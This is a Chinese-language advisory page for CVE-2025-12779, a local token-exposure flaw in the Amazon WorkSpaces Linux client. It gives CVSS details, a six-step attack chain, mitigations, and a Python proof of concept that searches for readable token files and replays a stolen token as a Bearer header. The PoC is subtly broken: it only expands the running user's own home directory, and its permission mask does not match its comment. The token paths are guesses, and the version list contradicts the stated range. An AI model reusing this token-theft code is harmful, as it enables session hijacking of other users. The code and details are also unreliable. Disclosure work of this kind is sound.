CVE-2025-12779: Amazon WorkSpaces Linux客户端认证令牌处理不当漏洞

漏洞信息

漏洞编号

CVE-2025-12779

漏洞类型

认证令牌泄露

CVSS评分

8.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Amazon WorkSpaces Client for Linux

漏洞概述

CVE-2025-12779是亚马逊WorkSpaces Linux客户端中的一个高危安全漏洞，CVSS评分高达8.8。该漏洞源于Amazon WorkSpaces客户端 for Linux（版本2023.0至2024.8）对认证令牌的处理不当，可能导致DCV（Desktop Cloud Vision）类型WorkSpaces的认证令牌被暴露给同一客户端机器上的其他本地用户。攻击者只需拥有低权限的本地用户账号，无需任何用户交互，即可利用此漏洞。成功利用后，攻击者能够提取同一机器上其他本地用户的认证令牌，并使用该令牌访问受害者的WorkSpace环境，从而造成机密性、完整性和可用性的高度影响。攻击向量为本地访问（AV:L），属于本地权限提升类漏洞。

技术细节

该漏洞的根本原因在于Amazon WorkSpaces客户端在处理DCV类型WorkSpaces的认证令牌时，存在不当的存储或权限管理机制。具体表现为：客户端将认证令牌存储在本地文件系统时，未能正确设置文件或目录的访问权限，导致同一系统上的其他本地用户能够读取这些敏感凭证。攻击者首先需要在目标系统上拥有有效的用户账号，然后通过文件系统访问或进程间通信等方式，获取存储在共享位置的认证令牌。一旦获取到受害用户的认证令牌，攻击者可以构造恶意请求，使用该令牌冒充合法用户访问其WorkSpace资源。由于CVSS向量的完整性影响为高，攻击者不仅能够读取敏感数据，还可能对WorkSpace环境进行未授权的修改和操作。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者在目标Linux系统上拥有有效的本地用户账号，并开始搜索WorkSpaces客户端的配置文件和认证令牌存储位置

STEP 2

步骤2: 令牌发现

攻击者遍历系统目录，查找Amazon WorkSpaces客户端存储认证令牌的文件位置，如~/.local/share/amazon-workspaces/或~/.config/amazon-workspaces/

STEP 3

步骤3: 权限检查

由于客户端对令牌文件的权限设置不当（允许组或其他用户读取），攻击者能够访问并读取其他用户的认证令牌文件

STEP 4

步骤4: 令牌提取

攻击者从配置文件中提取受害用户的认证令牌，可能通过解析JSON配置文件或直接读取令牌文件内容

STEP 5

步骤5: 会话劫持

攻击者使用提取的认证令牌，向WorkSpace服务端发起认证请求，成功冒充受害用户建立WorkSpace连接

STEP 6

步骤6: 资源访问

攻击者以受害用户身份访问其WorkSpace环境，可读取敏感数据、修改配置或执行未授权操作，造成机密性和完整性损失

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12779 PoC - Amazon WorkSpaces Linux Client Token Exposure
# This PoC demonstrates the token exposure vulnerability in WorkSpaces client

import os
import glob
import json

def find_exposed_tokens():
    """Search for improperly stored authentication tokens"""
    token_locations = [
        '~/.local/share/amazon-workspaces/',
        '~/.config/amazon-workspaces/',
        '/tmp/amazon-workspaces/',
        '/var/tmp/amazon-workspaces/'
    ]
    
    exposed_tokens = []
    for location in token_locations:
        expanded_path = os.path.expanduser(location)
        token_files = glob.glob(os.path.join(expanded_path, '**/*token*'), recursive=True)
        token_files.extend(glob.glob(os.path.join(expanded_path, '**/*.json'), recursive=True))
        
        for token_file in token_files:
            # Check if file permissions allow world/group read access
            stat_info = os.stat(token_file)
            mode = stat_info.st_mode
            
            # If file is readable by group or others, it's potentially exposed
            if mode & 0o047:  # Check group/other read bits
                with open(token_file, 'r') as f:
                    try:
                        content = f.read()
                        if 'token' in content.lower() or 'auth' in content.lower():
                            exposed_tokens.append({
                                'file': token_file,
                                'permissions': oct(mode),
                                'content_preview': content[:500]
                            })
                    except:
                        pass
    
    return exposed_tokens

def exploit_token(token, target_workspace_url):
    """
    Use exposed token to access victim's WorkSpace
    Note: This is for educational purposes only
    """
    import requests
    
    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }
    
    # Attempt to use the token
    response = requests.get(target_workspace_url, headers=headers)
    return response.status_code, response.text

if __name__ == '__main__':
    print('[+] Searching for exposed WorkSpaces tokens...')
    tokens = find_exposed_tokens()
    
    if tokens:
        print(f'[+] Found {len(tokens)} potentially exposed token(s)')
        for token in tokens:
            print(f'[*] Token file: {token["file"]}')
            print(f'[*] Permissions: {token["permissions"]}')
    else:
        print('[-] No exposed tokens found')

影响范围

Amazon WorkSpaces Client for Linux < 2023.0

Amazon WorkSpaces Client for Linux 2023.0

Amazon WorkSpaces Client for Linux 2023.1

Amazon WorkSpaces Client for Linux 2023.2

Amazon WorkSpaces Client for Linux 2024.0

Amazon WorkSpaces Client for Linux 2024.1

Amazon WorkSpaces Client for Linux 2024.2

Amazon WorkSpaces Client for Linux 2024.3

Amazon WorkSpaces Client for Linux 2024.4

Amazon WorkSpaces Client for Linux 2024.5

Amazon WorkSpaces Client for Linux 2024.6

Amazon WorkSpaces Client for Linux 2024.7

Amazon WorkSpaces Client for Linux 2024.8

防御指南

临时缓解措施

立即将Amazon WorkSpaces客户端 for Linux升级到版本2025.0或更高版本。在无法立即升级的情况下，应检查并修正客户端配置文件的访问权限，确保只有当前用户能够读取认证令牌文件；同时考虑限制同一系统上的用户数量，或使用独立的虚拟机环境隔离不同用户的WorkSpaces客户端。